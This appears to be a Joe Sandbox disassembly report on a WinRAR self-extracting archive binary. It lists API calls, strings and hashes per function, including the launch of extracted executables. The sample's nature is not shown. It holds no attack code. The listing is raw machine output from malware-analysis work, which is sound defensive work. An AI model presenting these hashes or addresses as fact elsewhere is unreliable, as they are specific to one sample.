4e179d CharUpperW 24525->24570 24527 4d8333 24527->24274 24530 4d7d7b 24528->24530 24529 4d7dbb 24529->24282 24530->24529 24571 4d7043 74 API calls 24530->24571 24532 4d7db3 24572 4d6dc1 74 API calls 24532->24572 24535 4d9d73 24534->24535 24538 4d9d82 24534->24538 24536 4d9d79 FlushFileBuffers 24535->24536 24535->24538 24536->24538 24537 4d9dfb SetFileTime 24537->24339 24538->24537 24539->24262 

                Control-flow Graph

                APIs
                  • Part of subcall function 004E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 004E00E4
                  • Part of subcall function 004E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004E00F6
                  • Part of subcall function 004E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004E0127
                  • Part of subcall function 004E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004E9DAC
                  • Part of subcall function 004EA335: OleInitialize.OLE32(00000000), ref: 004EA34E
                  • Part of subcall function 004EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004EA385
                  • Part of subcall function 004EA335: SHGetMalloc.SHELL32(00518430), ref: 004EA38F
                  • Part of subcall function 004E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 004E13C4
                  • Part of subcall function 004E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 004E13D8
                • GetCommandLineW.KERNEL32 ref: 004ED61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004ED643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004ED654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 004ED68E
                  • Part of subcall function 004ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ED29D
                  • Part of subcall function 004ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ED2D9
                • CloseHandle.KERNEL32(00000000), ref: 004ED697
                • GetModuleFileNameW.KERNEL32(00000000,0052DC90,00000800), ref: 004ED6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,0052DC90), ref: 004ED6BE
                • GetLocalTime.KERNEL32(?), ref: 004ED6C9
                • _swprintf.LIBCMT ref: 004ED708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004ED71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 004ED721
                • LoadIconW.USER32(00000000,00000064), ref: 004ED738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 004ED789
                • Sleep.KERNEL32(?), ref: 004ED7B7
                • DeleteObject.GDI32 ref: 004ED7F0
                • DeleteObject.GDI32(?), ref: 004ED800
                • CloseHandle.KERNEL32 ref: 004ED843
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjR
                • API String ID: 788466649-2615718643
                • Opcode ID: 236367713b3e6958419f7e4d2b3830aea5f888ec23d3212574b7254ddbaa9c5e
                • Instruction ID: b071242571b5d52fbd1f2c5172552983c9f26277daef8a7d2296eeaee9faaa9e
                • Opcode Fuzzy Hash: 236367713b3e6958419f7e4d2b3830aea5f888ec23d3212574b7254ddbaa9c5e
                • Instruction Fuzzy Hash: 9461D771900380AFD720AF639C4AF7B3BACBF55746F00441AF94592291DBB89D48D765

                Control-flow Graph
                • Graph for function at 004E9E1C (executed / not-executed basic-block node and edge data not reproduced)
                APIs
                • FindResourceW.KERNEL32(004EAE4D,PNG,?,?,?,004EAE4D,00000066), ref: 004E9E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,004EAE4D,00000066), ref: 004E9E46
                • LoadResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E59
                • LockResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004EAE4D,00000066), ref: 004E9E82
                • GlobalLock.KERNEL32(00000000), ref: 004E9E93
                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004E9EB7
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004E9EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 004E9F1B
                • GlobalFree.KERNEL32(00000000), ref: 004E9F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                • String ID: PNG
                • API String ID: 3656887471-364855578
                • Opcode ID: 2a307da038adf708c79b8a0383b45c0ef4083d7d04e0faac04ecea9647ecd47a
                • Instruction ID: e75dbbf4aaa8b11aab30b2d74f99f2737d352fb08fd220e18c7868dc5673f3cc
                • Opcode Fuzzy Hash: 2a307da038adf708c79b8a0383b45c0ef4083d7d04e0faac04ecea9647ecd47a
                • Instruction Fuzzy Hash: B1319E75204342ABC7109F23DC4896FBBADFF99752B04452AF902D23A0EB75DC04DAA5

                Control-flow Graph
                • Graph for function at 004DA5F4 (executed / not-executed basic-block node and edge data not reproduced)
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA692
                • GetLastError.KERNEL32(?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA69E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: ccf0a451c62311a0baa1818427108be70ef68d9b1cd074392e2e187b5ff2f5a0
                • Instruction ID: f7a6c7acce6455c55c562ae8dbd86c067720fcb215a7428b6725e2bb83ac970b
                • Opcode Fuzzy Hash: ccf0a451c62311a0baa1818427108be70ef68d9b1cd074392e2e187b5ff2f5a0
                • Instruction Fuzzy Hash: 7A415271505241EFC324EF69C894ADBF7E8BB58344F040A2BF5D9D3340D778A9688B96
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002,00000000), ref: 004F755E
                • TerminateProcess.KERNEL32(00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002,00000000), ref: 004F7565
                • ExitProcess.KERNEL32 ref: 004F7577
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 987d08e928bf29ee64b079565f779df25ba034d3bb1c0bbccc7182071c1bf4e3
                • Instruction ID: fdfb199c8cad1b72654059b47a0f96fbbc4fde3af6c707f158ff997880c0f7d0
                • Opcode Fuzzy Hash: 987d08e928bf29ee64b079565f779df25ba034d3bb1c0bbccc7182071c1bf4e3
                • Instruction Fuzzy Hash: 9CE04631000608ABCF11AF25CD4CA693F69EB10381F008019FA098A632CB3DDE42DA84
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: 4d32c08a495283af6162b4e4434c4f62634c38852f6c038eb99fe528bb37db19
                • Instruction ID: f4cdd47b0ed54f5c411af09e63eb2a2b37d6418ff8f38af00936f5a8ce26e6ca
                • Opcode Fuzzy Hash: 4d32c08a495283af6162b4e4434c4f62634c38852f6c038eb99fe528bb37db19
                • Instruction Fuzzy Hash: DB821970904245AEDF25DB60C8A5BFFB7A9AF05304F0841BFE8499B342DB385E45CB58
                APIs
                • __EH_prolog.LIBCMT ref: 004EAEE5
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-8108337
                • Opcode ID: 344362db3e4728776e9c5ca1fd6866f13115defb90410ef63a381029faea79c3
                • Instruction ID: 7a1cc681154dd3c55fef594e73f957db8c0e82328046b7e745054193706e6ba0
                • Opcode Fuzzy Hash: 344362db3e4728776e9c5ca1fd6866f13115defb90410ef63a381029faea79c3
                • Instruction Fuzzy Hash: 0D42FA70904294BEEB21AB629C49FFF7B7CEB11709F00405AF641A62D1CBB85D4CDB69

                Control-flow Graph
                • Graph for function at 004E00CF (executed / not-executed basic-block node and edge data not reproduced)
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 004E00E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004E00F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004E0127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004E03D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004E03F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004E0402
                • ReadFile.KERNEL32(00000000,?,00007FFE,00503BA4,00000000), ref: 004E0421
                • CloseHandle.KERNEL32(00000000), ref: 004E0479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004E048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 004E04E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 004E0510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004E054A
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • _swprintf.LIBCMT ref: 004E05BE
                • _swprintf.LIBCMT ref: 004E060A
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • AllocConsole.KERNEL32 ref: 004E0612
                • GetCurrentProcessId.KERNEL32 ref: 004E061C
                • AttachConsole.KERNEL32(00000000), ref: 004E0623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004E0649
                • WriteConsoleW.KERNEL32(00000000), ref: 004E0650
                • Sleep.KERNEL32(00002710), ref: 004E065B
                • FreeConsole.KERNEL32 ref: 004E0661
                • ExitProcess.KERNEL32 ref: 004E0669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: <P$ ?P$(>P$(@P$0AP$4=P$8<P$<?P$@>P$@@P$D=P$DAP$DXGIDebug.dll$P<P$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;P$T?P$X>P$X@P$\AP$`=P$dwmapi.dll$kernel32$l<P$p>P$p?P$p@P$uxtheme.dll$x=P$|<P$>P$?P
                • API String ID: 1201351596-3633057107
                • Opcode ID: 5fbde05619ee167f5d36279bfe78787849d72946eca18c4904cbdfc216aa3101
                • Instruction ID: c81ecc59ed99661f9d7adf9ad139564c919038ee39f34dd2dca4efe1a4f7ead5
                • Opcode Fuzzy Hash: 5fbde05619ee167f5d36279bfe78787849d72946eca18c4904cbdfc216aa3101
                • Instruction Fuzzy Hash: 0ED18FB1008384ABD330DF51D85DB9FBEECBF84705F00491EF6999A280DBB486488F66

                Control-flow Graph
                • Graph for function at 004EBDF5 (executed / not-executed basic-block node and edge data not reproduced)
                APIs
                • __EH_prolog.LIBCMT ref: 004EBDFA
                  • Part of subcall function 004EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004EAAFE
                • SetWindowTextW.USER32(?,?), ref: 004EC127
                • _wcsrchr.LIBVCRUNTIME ref: 004EC2B1
                • GetDlgItem.USER32(?,00000066), ref: 004EC2EC
                • SetWindowTextW.USER32(00000000,?), ref: 004EC2FC
                • SendMessageW.USER32(00000000,00000143,00000000,0051A472), ref: 004EC30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004EC335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 67afa806685e8fab39703c4f2eb087614f86c0ae5c7aaa30f1080a81a9389362
                • Instruction ID: 7c695bcf5584453f81f0cd3fd20f155de01a2e37f4e41c3d4634c603a05d304a
                • Opcode Fuzzy Hash: 67afa806685e8fab39703c4f2eb087614f86c0ae5c7aaa30f1080a81a9389362
                • Instruction Fuzzy Hash: 8EE19672D00158AADB25DBA1DC89EEF777CAF14316F0040ABF605E3191E7789E898F54

                Control-flow Graph
                • Graph for function at 004DD341 (executed / not-executed basic-block node and edge data not reproduced)
                APIs
                • __EH_prolog.LIBCMT ref: 004DD346
                • _wcschr.LIBVCRUNTIME ref: 004DD367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,004DD328,?), ref: 004DD382
                • __fprintf_l.LIBCMT ref: 004DD873
                  • Part of subcall function 004E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004DB652,00000000,?,?,?,00010418), ref: 004E1396
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
• Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$$9P$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-2293854026
                • Opcode ID: 9998216ca415411f796fd84e0e68801805b4083ae7cb4190a9a74c46650d1db6
                • Instruction ID: bf6b9e719010e5825aad3b6600b9356612aa32a19995c7e8bfa86f41336818e3
                • Opcode Fuzzy Hash: 9998216ca415411f796fd84e0e68801805b4083ae7cb4190a9a74c46650d1db6
                • Instruction Fuzzy Hash: 4C12B3B1D00219AACF24DFA5DC61AEEB7B5FF04704F1044AFE605A7381D7789A45CB58

                Control-flow Graph

                APIs
                  • Part of subcall function 004EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                  • Part of subcall function 004EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                  • Part of subcall function 004EAC74: IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                  • Part of subcall function 004EAC74: TranslateMessage.USER32(?), ref: 004EACB8
                  • Part of subcall function 004EAC74: DispatchMessageW.USER32(?), ref: 004EACC2
                • GetDlgItem.USER32(00000068,0052ECB0), ref: 004ECB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,004EA632,00000001,?,?,004EAECB,00504F88,0052ECB0), ref: 004ECB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004ECBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,005035B4), ref: 004ECBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004ECBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004ECBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004ECC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004ECC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004ECC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004ECC67
                • SendMessageW.USER32(00000000,000000C2,00000000,0050431C), ref: 004ECC76
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: df72ca20ff16f5a78e15cbf627a79fa4598ebe4f7bbcc8cc8cfb5e0f53db1a3f
                • Instruction ID: d2cb11482baa8db3dc1c007ca6dbb4ef7f33147351015ff8ac4e466c0838a680
                • Opcode Fuzzy Hash: df72ca20ff16f5a78e15cbf627a79fa4598ebe4f7bbcc8cc8cfb5e0f53db1a3f
                • Instruction Fuzzy Hash: 3131E171188B41BFE311DF20DC4AFAB7FACEB52709F000509F65096291DB645A0CE77A

Control-flow Graph

Control-flow graph 795: entry 004ECE22, basic blocks 004ECE22-004ED093 (graph nodes 795-869). External calls inside the graph: ShellExecuteExW (block 004ECF4F), ShowWindow (blocks 004ECF91 and 004ED081), GetExitCodeProcess (block 004ECFC6) and CloseHandle (block 004ECFF1); the remaining edges lead to internal subroutines. The rendered graph is not reproduced in this extract.
                APIs
                • ShellExecuteExW.SHELL32(?), ref: 004ECF54
                • ShowWindow.USER32(?,00000000), ref: 004ECF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 004ECFCF
                • CloseHandle.KERNEL32(?), ref: 004ECFF5
                • ShowWindow.USER32(?,00000001), ref: 004ED084
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: aecda42c00f66783c36692d4660e201ea98818bd32608a001f26f37567f742db
                • Instruction ID: 0837da593374d929ade93c7397abdc2b8484b93c89f03214149e155ac609bbbd
                • Opcode Fuzzy Hash: aecda42c00f66783c36692d4660e201ea98818bd32608a001f26f37567f742db
                • Instruction Fuzzy Hash: 8C6119708043C09ADB31DF66D8546AB7BE5EF9130AF08481FF4C097390D7B9898ADB5A

Control-flow Graph

Control-flow graph 870: entry 004FA058, basic blocks 004FA058-004FA273 (graph nodes 870-932). External calls inside the graph: MultiByteToWideChar (blocks 004FA099 and 004FA12D) and WideCharToMultiByte (block 004FA22C); the remaining edges lead to CRT-internal subroutines (004FE6ED, 004F8518, 004FA72C, 004FA2C0, 00501A30). The rendered graph is not reproduced in this extract.
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004F4E35,004F4E35,?,?,?,004FA2A9,00000001,00000001,3FE85006), ref: 004FA0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 004FA138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004FA232
                • __freea.LIBCMT ref: 004FA23F
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • __freea.LIBCMT ref: 004FA248
                • __freea.LIBCMT ref: 004FA26D
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 6d5b2c4eaaa8a3a60cf1b1e21aea874a1bd4c93c967179896188fda356deee56
                • Instruction ID: 25edb09e32ad25399a5d53c813955a8b440b7324e87f406eb19f51fef9c9e765
                • Opcode Fuzzy Hash: 6d5b2c4eaaa8a3a60cf1b1e21aea874a1bd4c93c967179896188fda356deee56
                • Instruction Fuzzy Hash: 865128B270020AAFDB248F60CC41EBF77A9EB40754F16426AFE08D6340DB39DC60C65A

                Control-flow Graph

                APIs
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • OleInitialize.OLE32(00000000), ref: 004EA34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004EA385
                • SHGetMalloc.SHELL32(00518430), ref: 004EA38F
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll$3vo
                • API String ID: 3498096277-646756056
                • Opcode ID: eb9f933bd5634451b0e726ea515032bade21613097ece8e76cc0cc5931563cf5
                • Instruction ID: 15de3df40ff73f99dc751eafedbfd1f15611a4dc5e35ec064f1dd566ec852dc2
                • Opcode Fuzzy Hash: eb9f933bd5634451b0e726ea515032bade21613097ece8e76cc0cc5931563cf5
